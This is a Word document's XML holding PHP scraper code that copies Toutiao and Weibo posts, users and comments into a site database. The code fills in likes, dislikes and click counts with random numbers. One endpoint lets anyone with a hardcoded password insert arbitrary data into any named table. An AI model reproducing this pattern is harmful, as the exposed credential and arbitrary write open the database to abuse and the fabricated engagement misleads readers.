      </w:r>
    </w:p>
    <w:p w14:paraId="1D87D7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data['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F530C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ame = 'video';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302016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data[$name]) || !$data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A17A4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mychannel=3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58217B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7A1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data['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419805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00981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mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误，范围</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-3';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C771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504A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a){exit('-1');}if(empty($data['pwd']) || $data['pwd'] != 'suxiang1424445608'){exit('-2');}else{unset($data['pwd']);$name=$data['__name__'];unset($data['__name__']);echo Db::name($name)-&gt;insertGetId($data);} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E30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A3A7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eshi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358A1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38C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toutiao_ping($aid,$group_id='',$item_id=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8403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rand(1,50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29742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group_id || !$item_id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EED9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2C72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toutiao/ping_3/group_id/'.$group_id.'/item_id/'.$item_id.'/count/'.$count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51290B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true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FFA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15D90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v['text'];           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416040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rand(1,999);           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2497F3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v['create_time'];       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7472BB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aid;                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708663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rand(20,229);             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3BD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007CD2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4F97C2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this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFED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4A299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g']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BDB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ame'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68827F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7157AE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4BCE94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1B6D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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34EA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b::name('article_ping')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1597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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A50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39645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6FD6A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aid)-&gt;update(['pingNum'=&gt;$i,'zan'=&gt;rand(0,300),'cai'=&gt;rand(0,50),'click'=&gt;rand(1,9999)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F155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5A5E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toutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D6D4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weibo();return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3A3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54D171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toutiao/weitoutiao";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0206D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true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76EB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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D7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7734D1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40511D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lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2B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title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA7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gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47920C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s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49026C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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D146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1343F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8639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85904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user_id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17E9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0253A2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5DA07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this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C62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0BED1F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userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1A1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ame'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32F5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40FE69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7B2367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5275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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7268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61AD9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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A9D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55410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B0925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user'])) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E949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id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B49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23333B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v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FAF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userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46479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age']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486A6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ickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD81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0D0C8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3559BE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EF3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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36C4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content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2128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content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F81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01C81C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75036E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this-&gt;qiniu($v['image']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC551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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFB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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC54B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DED8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images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19C9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this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162F8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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED1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3E25E7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mage']=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C41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ACAB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2DB4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ages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B3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str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5C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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A3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video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CE9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视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0718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27461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8ECA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mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03E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this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9B4C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9851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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881C2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v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519DB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v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06B8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v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED9C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7E9880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des']                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F3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19D1EB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utiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254DA7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toutiao']         =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F236E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7D59B1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0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F671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2D5F2D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v['item_id'].($data['title'] ? $data['title'] : $data['description'])."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766FC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toutiao_ping($id,$v['item_id'],$v['item_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC6B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CE227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B0545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bo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F1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Request::instance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E66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weibo";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06C7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true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FD1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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729124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4524D5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311492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lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D35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title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D16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gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18682C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s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8859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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD4D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0F2F9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45C45B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EBD0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user_id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACA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294DC9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282D52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v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB61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v['user_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BB9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g']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7E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ickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B32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63B93A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408A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0E7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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47234E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093C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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31236C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70330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617F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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07613C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description'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AA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content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A14F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21607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0CAF4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v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F99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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7797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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF71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images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354459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mg=$this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3AC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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92C8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06343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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83BB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CF88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A88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ages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4B3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str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFC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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF583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video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB67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视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455975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13FC42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F8A54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mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE82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this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AAD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1C1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empty($v['title']) ? $v['title'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D57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v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A37F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v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C3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v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E0A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012A0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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43969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03FD03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utiao_tiemId']     =           $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6FD6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toutiao']         =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FF2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0C85DE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0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B101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4F96A2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id.$data['title'] ? $data['title'] : $data['description']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F314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weibo_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866B4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2FA3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91E9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weibo_ping($aid='',$id='',$mid=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC61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rand(1,10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74238B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 || !$mid || !$aid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B49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p>
    <w:p w14:paraId="34F3C3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B21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weibo/ping/id/'.$id.'/mid/'.$mid.'/count/'.$count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE05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this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB235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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF5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1B0DE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6288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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425C8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687C71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ontent']=$v['text'];           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E0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rand(1,999);           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6682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me']=$v['create_time'];       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF5C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aid']=$aid;                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67748D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zan']=rand(20,229);             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6262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_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275CC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3C2237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userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A82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v['user_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7F3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g']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F9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nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5906C6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740BE8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD40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EF0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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654653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b::name('article_ping')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED20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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C73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09D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7D2D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article')-&gt;where('id',$aid)-&gt;update(['pingNum'=&gt;$i,'zan'=&gt;rand(0,300),'cai'=&gt;rand(0,50),'click'=&gt;rand(1,9999)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27577B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224AD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dian(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342788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outiao/redian";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA23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this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E66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html){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576CA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无热点数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59462A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83D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ao = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81B0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html as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D29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ao &gt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DBB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51ACC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03007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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D4B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lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095A2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title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177963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dtitle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8BA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v['title'])-&gt;whereOr('dtitle',$v['dtitle'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EC9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8B98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s=Db::name("article")-&gt;where('title',$v['title'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50339B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EE9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itles){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC371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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6B9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56A79D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607F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C1A7F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标题不能为空：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9457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68FF88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1FC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user']['id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156548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Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user']['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998C1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2439FE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Info=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEEF1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toutiao_uid']=$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0CF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img']=$this-&gt;qiniu($userInfo['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605A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userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C42F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Data['qianming']=$userInfo['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E654C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this-&gt;user($userData); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F271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A400C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id'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46302D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13BA7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用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28900A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38F66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CD5D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image'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647984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          =           $this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA51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A7D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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43331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content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931F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content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDE2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4E72AA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200EAB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        =           $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4D6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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337468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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0A7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v['images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D9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this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0431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ages[]=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE047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k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60258D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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF07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B62A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79C0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json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF6E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images']=str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA7C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v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BCA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video'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41241C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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217545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inue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF23E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452B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this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB43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DE0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tle']              =           $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411B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title']             =           $v['dtitle'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705E3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cription']        =           $v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F85F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e_time']        =           $v['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C48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pdate_time']        =           $v['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B147D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hide']               =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16D7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des']                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536460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ychannel']          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3B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outiao_tiemId']     =           $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A94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weitoutiao']         =           0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C0B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lags']              =           2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58F4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v['typeid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A54F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 = $this-&gt;catename($v['typeid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED04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7DFAA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id']='news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EC8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52A02B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mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A13B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video'] = $this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B5E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14E9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Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C47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id:'.$id.$data['dtitle'] ? $data['dtitle'] : $data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331F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toutiao_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F502B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ao ++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF85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5A7B6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0E7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typeid($name='news_edu'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B972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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62188A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629378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7FE6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outiao/category';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB60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ml = $this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328EA8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html['data']) &amp;&amp; count($html['data']['data'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E904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html['data']['data'];</w:t>
      </w:r>
    </w:p>
